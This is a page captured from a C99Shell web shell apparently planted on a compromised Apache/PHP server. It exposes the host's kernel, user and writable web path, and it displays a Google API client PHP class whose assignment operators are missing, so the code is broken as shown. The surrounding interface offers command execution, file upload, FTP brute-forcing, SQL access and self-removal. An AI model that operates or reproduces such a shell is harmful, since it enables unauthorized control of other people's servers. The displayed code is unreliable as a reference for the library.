!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/google/apiclient-services/src/Google/Service/Directory/   drwxrwxrwx
Free 13.18 GB of 57.97 GB (22.73%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ChromeOsDevice.php (10.43 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

class Google_Service_Directory_ChromeOsDevice extends Google_Collection
{
  protected 
$collection_key 'systemRamFreeReports';
  protected 
$activeTimeRangesType 'Google_Service_Directory_ChromeOsDeviceActiveTimeRanges';
  protected 
$activeTimeRangesDataType 'array';
  public 
$annotatedAssetId;
  public 
$annotatedLocation;
  public 
$annotatedUser;
  public 
$autoUpdateExpiration;
  public 
$bootMode;
  protected 
$cpuStatusReportsType 'Google_Service_Directory_ChromeOsDeviceCpuStatusReports';
  protected 
$cpuStatusReportsDataType 'array';
  protected 
$deviceFilesType 'Google_Service_Directory_ChromeOsDeviceDeviceFiles';
  protected 
$deviceFilesDataType 'array';
  public 
$deviceId;
  protected 
$diskVolumeReportsType 'Google_Service_Directory_ChromeOsDeviceDiskVolumeReports';
  protected 
$diskVolumeReportsDataType 'array';
  public 
$dockMacAddress;
  public 
$etag;
  public 
$ethernetMacAddress;
  public 
$ethernetMacAddress0;
  public 
$firmwareVersion;
  public 
$kind;
  public 
$lastEnrollmentTime;
  protected 
$lastKnownNetworkType 'Google_Service_Directory_ChromeOsDeviceLastKnownNetwork';
  protected 
$lastKnownNetworkDataType 'array';
  public 
$lastSync;
  public 
$macAddress;
  public 
$manufactureDate;
  public 
$meid;
  public 
$model;
  public 
$notes;
  public 
$orderNumber;
  public 
$orgUnitPath;
  public 
$osVersion;
  public 
$platformVersion;
  protected 
$recentUsersType 'Google_Service_Directory_RecentUsers';
  protected 
$recentUsersDataType 'array';
  protected 
$screenshotFilesType 'Google_Service_Directory_ChromeOsDeviceScreenshotFiles';
  protected 
$screenshotFilesDataType 'array';
  public 
$serialNumber;
  public 
$status;
  public 
$supportEndDate;
  protected 
$systemRamFreeReportsType 'Google_Service_Directory_ChromeOsDeviceSystemRamFreeReports';
  protected 
$systemRamFreeReportsDataType 'array';
  public 
$systemRamTotal;
  protected 
$tpmVersionInfoType 'Google_Service_Directory_ChromeOsDeviceTpmVersionInfo';
  protected 
$tpmVersionInfoDataType '';
  public 
$willAutoRenew;

  
/**
   * @param Google_Service_Directory_ChromeOsDeviceActiveTimeRanges[]
   */
  
public function setActiveTimeRanges($activeTimeRanges)
  {
    
$this->activeTimeRanges $activeTimeRanges;
  }
  
/**
   * @return Google_Service_Directory_ChromeOsDeviceActiveTimeRanges[]
   */
  
public function getActiveTimeRanges()
  {
    return 
$this->activeTimeRanges;
  }
  public function 
setAnnotatedAssetId($annotatedAssetId)
  {
    
$this->annotatedAssetId $annotatedAssetId;
  }
  public function 
getAnnotatedAssetId()
  {
    return 
$this->annotatedAssetId;
  }
  public function 
setAnnotatedLocation($annotatedLocation)
  {
    
$this->annotatedLocation $annotatedLocation;
  }
  public function 
getAnnotatedLocation()
  {
    return 
$this->annotatedLocation;
  }
  public function 
setAnnotatedUser($annotatedUser)
  {
    
$this->annotatedUser $annotatedUser;
  }
  public function 
getAnnotatedUser()
  {
    return 
$this->annotatedUser;
  }
  public function 
setAutoUpdateExpiration($autoUpdateExpiration)
  {
    
$this->autoUpdateExpiration $autoUpdateExpiration;
  }
  public function 
getAutoUpdateExpiration()
  {
    return 
$this->autoUpdateExpiration;
  }
  public function 
setBootMode($bootMode)
  {
    
$this->bootMode $bootMode;
  }
  public function 
getBootMode()
  {
    return 
$this->bootMode;
  }
  
/**
   * @param Google_Service_Directory_ChromeOsDeviceCpuStatusReports[]
   */
  
public function setCpuStatusReports($cpuStatusReports)
  {
    
$this->cpuStatusReports $cpuStatusReports;
  }
  
/**
   * @return Google_Service_Directory_ChromeOsDeviceCpuStatusReports[]
   */
  
public function getCpuStatusReports()
  {
    return 
$this->cpuStatusReports;
  }
  
/**
   * @param Google_Service_Directory_ChromeOsDeviceDeviceFiles[]
   */
  
public function setDeviceFiles($deviceFiles)
  {
    
$this->deviceFiles $deviceFiles;
  }
  
/**
   * @return Google_Service_Directory_ChromeOsDeviceDeviceFiles[]
   */
  
public function getDeviceFiles()
  {
    return 
$this->deviceFiles;
  }
  public function 
setDeviceId($deviceId)
  {
    
$this->deviceId $deviceId;
  }
  public function 
getDeviceId()
  {
    return 
$this->deviceId;
  }
  
/**
   * @param Google_Service_Directory_ChromeOsDeviceDiskVolumeReports[]
   */
  
public function setDiskVolumeReports($diskVolumeReports)
  {
    
$this->diskVolumeReports $diskVolumeReports;
  }
  
/**
   * @return Google_Service_Directory_ChromeOsDeviceDiskVolumeReports[]
   */
  
public function getDiskVolumeReports()
  {
    return 
$this->diskVolumeReports;
  }
  public function 
setDockMacAddress($dockMacAddress)
  {
    
$this->dockMacAddress $dockMacAddress;
  }
  public function 
getDockMacAddress()
  {
    return 
$this->dockMacAddress;
  }
  public function 
setEtag($etag)
  {
    
$this->etag $etag;
  }
  public function 
getEtag()
  {
    return 
$this->etag;
  }
  public function 
setEthernetMacAddress($ethernetMacAddress)
  {
    
$this->ethernetMacAddress $ethernetMacAddress;
  }
  public function 
getEthernetMacAddress()
  {
    return 
$this->ethernetMacAddress;
  }
  public function 
setEthernetMacAddress0($ethernetMacAddress0)
  {
    
$this->ethernetMacAddress0 $ethernetMacAddress0;
  }
  public function 
getEthernetMacAddress0()
  {
    return 
$this->ethernetMacAddress0;
  }
  public function 
setFirmwareVersion($firmwareVersion)
  {
    
$this->firmwareVersion $firmwareVersion;
  }
  public function 
getFirmwareVersion()
  {
    return 
$this->firmwareVersion;
  }
  public function 
setKind($kind)
  {
    
$this->kind $kind;
  }
  public function 
getKind()
  {
    return 
$this->kind;
  }
  public function 
setLastEnrollmentTime($lastEnrollmentTime)
  {
    
$this->lastEnrollmentTime $lastEnrollmentTime;
  }
  public function 
getLastEnrollmentTime()
  {
    return 
$this->lastEnrollmentTime;
  }
  
/**
   * @param Google_Service_Directory_ChromeOsDeviceLastKnownNetwork[]
   */
  
public function setLastKnownNetwork($lastKnownNetwork)
  {
    
$this->lastKnownNetwork $lastKnownNetwork;
  }
  
/**
   * @return Google_Service_Directory_ChromeOsDeviceLastKnownNetwork[]
   */
  
public function getLastKnownNetwork()
  {
    return 
$this->lastKnownNetwork;
  }
  public function 
setLastSync($lastSync)
  {
    
$this->lastSync $lastSync;
  }
  public function 
getLastSync()
  {
    return 
$this->lastSync;
  }
  public function 
setMacAddress($macAddress)
  {
    
$this->macAddress $macAddress;
  }
  public function 
getMacAddress()
  {
    return 
$this->macAddress;
  }
  public function 
setManufactureDate($manufactureDate)
  {
    
$this->manufactureDate $manufactureDate;
  }
  public function 
getManufactureDate()
  {
    return 
$this->manufactureDate;
  }
  public function 
setMeid($meid)
  {
    
$this->meid $meid;
  }
  public function 
getMeid()
  {
    return 
$this->meid;
  }
  public function 
setModel($model)
  {
    
$this->model $model;
  }
  public function 
getModel()
  {
    return 
$this->model;
  }
  public function 
setNotes($notes)
  {
    
$this->notes $notes;
  }
  public function 
getNotes()
  {
    return 
$this->notes;
  }
  public function 
setOrderNumber($orderNumber)
  {
    
$this->orderNumber $orderNumber;
  }
  public function 
getOrderNumber()
  {
    return 
$this->orderNumber;
  }
  public function 
setOrgUnitPath($orgUnitPath)
  {
    
$this->orgUnitPath $orgUnitPath;
  }
  public function 
getOrgUnitPath()
  {
    return 
$this->orgUnitPath;
  }
  public function 
setOsVersion($osVersion)
  {
    
$this->osVersion $osVersion;
  }
  public function 
getOsVersion()
  {
    return 
$this->osVersion;
  }
  public function 
setPlatformVersion($platformVersion)
  {
    
$this->platformVersion $platformVersion;
  }
  public function 
getPlatformVersion()
  {
    return 
$this->platformVersion;
  }
  
/**
   * @param Google_Service_Directory_RecentUsers[]
   */
  
public function setRecentUsers($recentUsers)
  {
    
$this->recentUsers $recentUsers;
  }
  
/**
   * @return Google_Service_Directory_RecentUsers[]
   */
  
public function getRecentUsers()
  {
    return 
$this->recentUsers;
  }
  
/**
   * @param Google_Service_Directory_ChromeOsDeviceScreenshotFiles[]
   */
  
public function setScreenshotFiles($screenshotFiles)
  {
    
$this->screenshotFiles $screenshotFiles;
  }
  
/**
   * @return Google_Service_Directory_ChromeOsDeviceScreenshotFiles[]
   */
  
public function getScreenshotFiles()
  {
    return 
$this->screenshotFiles;
  }
  public function 
setSerialNumber($serialNumber)
  {
    
$this->serialNumber $serialNumber;
  }
  public function 
getSerialNumber()
  {
    return 
$this->serialNumber;
  }
  public function 
setStatus($status)
  {
    
$this->status $status;
  }
  public function 
getStatus()
  {
    return 
$this->status;
  }
  public function 
setSupportEndDate($supportEndDate)
  {
    
$this->supportEndDate $supportEndDate;
  }
  public function 
getSupportEndDate()
  {
    return 
$this->supportEndDate;
  }
  
/**
   * @param Google_Service_Directory_ChromeOsDeviceSystemRamFreeReports[]
   */
  
public function setSystemRamFreeReports($systemRamFreeReports)
  {
    
$this->systemRamFreeReports $systemRamFreeReports;
  }
  
/**
   * @return Google_Service_Directory_ChromeOsDeviceSystemRamFreeReports[]
   */
  
public function getSystemRamFreeReports()
  {
    return 
$this->systemRamFreeReports;
  }
  public function 
setSystemRamTotal($systemRamTotal)
  {
    
$this->systemRamTotal $systemRamTotal;
  }
  public function 
getSystemRamTotal()
  {
    return 
$this->systemRamTotal;
  }
  
/**
   * @param Google_Service_Directory_ChromeOsDeviceTpmVersionInfo
   */
  
public function setTpmVersionInfo(Google_Service_Directory_ChromeOsDeviceTpmVersionInfo $tpmVersionInfo)
  {
    
$this->tpmVersionInfo $tpmVersionInfo;
  }
  
/**
   * @return Google_Service_Directory_ChromeOsDeviceTpmVersionInfo
   */
  
public function getTpmVersionInfo()
  {
    return 
$this->tpmVersionInfo;
  }
  public function 
setWillAutoRenew($willAutoRenew)
  {
    
$this->willAutoRenew $willAutoRenew;
  }
  public function 
getWillAutoRenew()
  {
    return 
$this->willAutoRenew;
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0059 ]--